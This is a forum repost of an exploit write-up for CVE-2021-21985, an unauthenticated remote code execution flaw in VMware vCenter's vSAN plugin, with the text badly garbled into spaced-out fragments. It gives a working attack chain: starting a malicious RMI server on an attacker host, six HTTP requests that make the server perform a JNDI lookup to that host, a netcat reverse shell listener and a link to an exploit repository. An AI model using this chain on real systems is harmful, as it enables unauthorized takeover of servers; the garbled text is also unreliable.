搜索

[20617] 2021-06-07_CVE-2021-21985VmwarevCenterunauthRCE

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2021-06-07_CVE-2021-21985VmwarevCenterunauthRCE C V E - 2 0 2 1 - 2 1 9 8 5   V m w a r e   v C e n t e r   u n a u t h   R C E x n i a n q   K h a n   2 0 2 1 - 0 6 - 0 7                 V M w a r e   v C e n t e r   S e r v e r V M w a r e 广 使 v C e n t e r                 4 4 3 访 v C e n t e r   S e r v e r 0 x 0 1   h t t p s : / / a t t a c k e r k b . c o m / t o p i c s / X 8 5 G K j a V E R / c v e - 2 0 2 1 - 2 1 9 8 5 ? r e f e r r e r = h o m e # r a p i d 7 - a n a l y s i s 0 x 0 2                   b e a n s r c e l o c a l i z e d M e s s a g e B u n d l e v s a n W o r k e r T h r e a d F a c t o r y v s a n T h r e a d P o o l I m p l v s a n S e r v i c e B u n d l e A c t i v a t o r v s a n S e r v i c e F a c t o r y v s a n P r o v i d e r U t i l s _ s e t V m o d l H e l p e r v s a n P r o v i d e r U t i l s _ s e t V s a n S e r v i c e F a c t o r y
V s p h e r e   U I 使 t o m c a t j n d i   r m i   b y p a s s h t t p s : / / g i t h u b . c o m / w e l k 1 n / J N D I - I n j e c t i o n - B y p a s s / b l o b / m a s t e r / s r c / m a i n / j a v a / p a y l o a d s / E v i l R M I S e r v e r . j a v a 使 1 .   r m i   j a v a   - c p   J N D I - I n j e c t i o n - B y p a s s - 1 . 0 - S N A P S H O T - a l l . j a r   p a y l o a d s . E v i l R M I S e r v e r   a t t i p   v s a n P r o v i d e r U t i l s _ s e t V s a n S e r v i c e F a c t o r y v s a n Q u e r y U t i l _ s e t D a t a S e r v i c e v s a n C o m p o n e n t s P r o v i d e r I m p l c a p a b i l i t y P r o p e r t y P r o v i d e r I m p l p b m D a t a P r o v i d e r I m p l v s a n C a p a b i l i t y C a c h e M a n a g e r v s a n C a p a b i l i t y U t i l s _ s e t V s a n C a p a b i l i t y C a c h e M a n a g e r v s a n U t i l s _ s e t M e s s a g e B u n d l e v s a n F o r m a t U t i l s _ s e t U s e r S e s s i o n S e r v i c e S t e p 1 h t t p s : / / h o s t / u i / h 5 - v s a n / r e s t / p r o x y / s e r v i c e / & v s a n Q u e r y U t i l _ s e t D a t a S e r v i c e / s e t T a r g e t O b j e c t { " m e t h o d I n p u t " : [ n u l l ] } S t e p 2 h t t p s : / / h o s t / u i / h 5 - v s a n / r e s t / p r o x y / s e r v i c e / & v s a n Q u e r y U t i l _ s e t D a t a S e r v i c e / s e t S t a t i c M e t h o d { " m e t h o d I n p u t " : [ " j a v a x . n a m i n g . I n i t i a l C o n t e x t . d o L o o k u p " ] } S t e p 3 h t t p s : / / h o s t / u i / h 5 - v s a n / r e s t / p r o x y / s e r v i c e / & v s a n Q u e r y U t i l _ s e t D a t a S e r v i c e / s e t T a r g e t M e t h o d { " m e t h o d I n p u t " : [ " d o L o o k u p " ] } S t e p 4   h t t p s : / / h o s t / u i / h 5 - v s a n / r e s t / p r o x y / s e r v i c e / & v s a n Q u e r y U t i l _ s e t D a t a S e r v i c e / s e t A r g u m e n t s { " m e t h o d I n p u t " : [ [ " r m i : / / a t t i p : 1 0 9 7 / E x e c B y E L " ] ] } S t e p 5 h t t p s : / / h o s t / u i / h 5 - v s a n / r e s t / p r o x y / s e r v i c e / & v s a n Q u e r y U t i l _ s e t D a t a S e r v i c e / p r e p a r e { " m e t h o d I n p u t " : [ ] } S t e p 6 h t t p s : / / h o s t / u i / h 5 - v s a n / r e s t / p r o x y / s e r v i c e / & v s a n Q u e r y U t i l _ s e t D a t a S e r v i c e / i n v o k e { " m e t h o d I n p u t " : [ ] }
2 .   r e v e r s e   s h e l l 3 .   p a y l o a d s h e l l   h t t p s : / / g i t h u b . c o m / x n i a n q / c v e - 2 0 2 1 - 2 1 9 8 5 _ e x p n c   - l v v p   5 5 5 5
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理